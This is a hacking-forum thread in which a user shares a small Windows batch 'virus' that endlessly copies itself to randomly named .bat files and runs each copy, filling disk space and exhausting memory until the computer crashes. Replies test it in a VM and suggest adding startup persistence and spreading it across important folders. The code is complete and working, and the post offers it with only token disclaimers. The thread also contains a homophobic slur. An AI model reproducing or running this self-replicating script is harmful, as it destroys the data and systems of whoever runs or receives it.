Hack Forums

Full Version: very dangerous batch, will destroy your computer!!!!
You're currently viewing a stripped down version of our content. View the full version with proper formatting.
Pages: 1 2 3 4 5
I just created the following batch file and ran it on myself and am SUPER glad i shut my computer off, because this batch file creates another batch file at random numbers, then puts the same code of itself in each of those files, then runs those bats, which ALSO do the same thing, constantly, forever, until your stop it.

what this will do, if you leave it on long enough, is it will store itself in ALOT of your hard drive space, making it almost ZERO, then also use up all your ram as your computer goes through all the files, and crash your pc. this virus WILL REQUIRE YOU TO REINSTALL WINDOWS!!!! to get rid of it!!!!

now, if you really wanted to make it a bad batch file, you could have it copy itself to startup, so that when you start up, the horror starts all over again, ON TOP OF ITSELF!!!!.



let me tell you, i let it run only five seconds, and that's b/c it took almost five seconds for the shutdown, and i deleted almost 9 megabytes of diskspace used by just BATCH FILES (which are 1 kb a PIECE!!) just imagine what would have happened to me if i let it run for just one minute...it'd be GIGS and probably well past GIGS in 10 minutes.

so, be careful guys, don't run it on yourself unless you have a virtual machine to limit your disk space used (even that might not be safe).

my usual warning, DON'T DO ANYTHING STUPID! DON'T DO ANYTHING ILLEGAL WITH THIS!

Code:
@echo off
:A
SET /A X=%RANDOM%%%1999999999%
type damage.bat >> %x%.bat
start %x%.bat
goto:A

i am not responsible for any idiots who decide to run this code.
Where did you get the code,I mean where did you first see it.
i JUST wrote it man, all by meh-self...seriously, no kidding.
niceVictoire!!!!
Lol..Ok Believe you,it's just that I saw this code,well something similar a while back when I was getting advanced into batches.
oh :( ok......*walks away sad that he didn't just invent the first "Batch WMD"*
Psinetic Wrote:oh :( ok......*walks away sad that he didn't just invent the first "Batch WMD"*

lo0o0o0o0o0o0ol Roflmao
that was funny wasn't it? haha....funny, hilarious..so.....STOP SPAMMING QUEER!!! ok, deep breath taken. nah, i'm just kidding kira.

just don't be the dumb dumb that runs that code on yourself and wishes you didn't later, it'll bite u in the butt.

(just uh....kira, watch out with what you write. if you type something stupid santa-omni will ban you, so....yeah, just watch what you write).... -_-
hahaha....i just ran it on my Virtual PC...about to see how it did :D

ok, so i left it on for like....5 minutes. i ended up deleting 2,991 batch files. all of which contain the code above...all of which, if ran at the same time...dear lord...would completely ravage my system. now, if ya REALLY wanted to be a jerk, you could have it copy itself and run itself in various part of your computer, pick like 10 important folders and let 'er rip.

then, you could also have it make a startup batch, which will have a code to make it run ALL batch file i a specific folder. so...if you have it run all batch files in my desktop right now....you'll have 2,991 batch file all with that devestating code above, running simultaneously, also running hundreds and hundreds more SIMULTANEOUSLY.

now THAT would be a really really bad file.
LMAO Psi u make me laugh
Pages: 1 2 3 4 5
Reference URL's